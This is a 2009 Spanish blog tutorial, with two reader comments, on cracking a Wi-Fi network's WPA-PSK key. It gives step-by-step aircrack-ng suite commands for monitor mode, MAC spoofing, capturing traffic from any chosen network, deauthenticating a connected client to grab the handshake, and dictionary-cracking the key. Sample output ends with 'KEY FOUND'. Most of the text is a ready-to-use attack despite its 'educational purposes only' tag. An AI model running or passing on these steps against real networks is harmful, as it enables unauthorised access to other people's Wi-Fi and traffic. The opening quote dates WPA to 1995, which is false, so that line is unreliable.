¿Qué es WPA-PSK?
Quote Wikipedia: “WPA (Wi-Fi Protected Access - 1995 - Acceso Protegido Wi-Fi) es un sistema para proteger las redes inalámbricas (Wi-Fi); creado para corregir las deficiencias del sistema previo WEP.
WPA-PSK: WPA Pre-Shared Key. Modalidad donde la clave es preestablecida y se pone en el router.
¿Cómo se crackea?
No es necesario esnifear mucho trafico. Por eso, aunque la cantidad de trafico no es importante su nivel de seguridad es mucho mayor debido a que los posibles atacantes deben tener paciencia para encontrar el trafico correcto. Este trafico correcto donde se realizan las presentaciones entre estaciones cliente y los punto de acceso se le denomina como “handshakes”.
Una clave WPA-PSK se crackea mediante un diccionario. El diccionario que yo utlizaré es de unos 2GB. Lo podéis descargar aquí.
*En este tutorial todas las mac y bssid están falsificados*
Empezemos…
Ponemos a nuestra tarjeta wireless en modo monitor y le cambiamos la mac. Después, empezamos a capturar tráfico de la red que queramos.
Pasos:
1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
- airmon-ng stop eth1
- ifconfig eth1 down
- macchanger --mac 00:11:22:33:44:55 eth1
- airmon-ng start eth1
- airodump-ng eth1
- airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1
Deaunteficiación a un cliente:
- aireplay-ng -0 30 -a (Aqui va el BSSID) -c (MAC cliente) (Nombre de la tarjeta de red)
Que en este ejemplo:
aireplay-ng -0 30 -a 00:16:38:F2:D5:E1 -c 00:19:7E:6D:AC:AC eth1
16:27:11 Waiting for beacon frame (BSSID: 00:16:38:F2:D5:E1) on channel 3
16:27:12 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [83|10 ACKs]
16:27:13 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [68| 1 ACKs]
16:27:14 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [13| 3 ACKs]
16:27:15 Sending 64 directed DeAuth. STMAC: [00:19:7E:6D:AC:AC] [70|38 ACKs]
- Una vez conseguido los paquetes necesarios (se intentar a partir de 10 data) aplicaremos nuestro diccionario para ir probando las claves.
Para ello, abrimos otra consola y escribimos:
- aircrack-ng (nombre archivo output) -w (ruta diccionario)
aircrack-ng output-02.cap -w /root/pass_habituales.txt
----------------------------------------------------------------------------------
Le damos un enter y:
Aircrack-ng 1.0 rc1 r1085
[00:00:01] 162 keys tested (103.96 k/s)
KEY FOUND! [ 123MONZISEZ456 ]
Master Key : F0 CA 6C 0A 13 95 17 AF 72 2D F4 FE 0D 78 EF F3
99 EE DE 07 C4 EB B5 C2 5B DF 33 36 AE 7D FC DC
Transcient Key : 0C CE 37 B4 95 77 C7 51 30 0A 1A 49 D1 91 BE 0B
CF 2C 3F 65 87 BF 11 AC 07 F2 B7 37 C7 92 A7 B4
7F 6A A5 F5 B4 DF 1F 42 41 15 B5 0D A3 6B FC 07
8C 04 97 30 63 2D 33 6A CE DA 63 F9 0E F6 99 28
EAPOL HMAC : 21 ED BD DA 1D 55 43 10 E9 52 E7 75 E9 C5 53 A5
-----------------------------------------------------------------------------------
TUTORIAL BY MONZI_SEZ
EDUCATIONAL PURPOSES ONLY
16 de Diciembre de 2009.
Qué máquina chaval!, XD, sigue así!! ya te queda poco para alcanzarme, :XD
ResponderEliminarkm
ResponderEliminar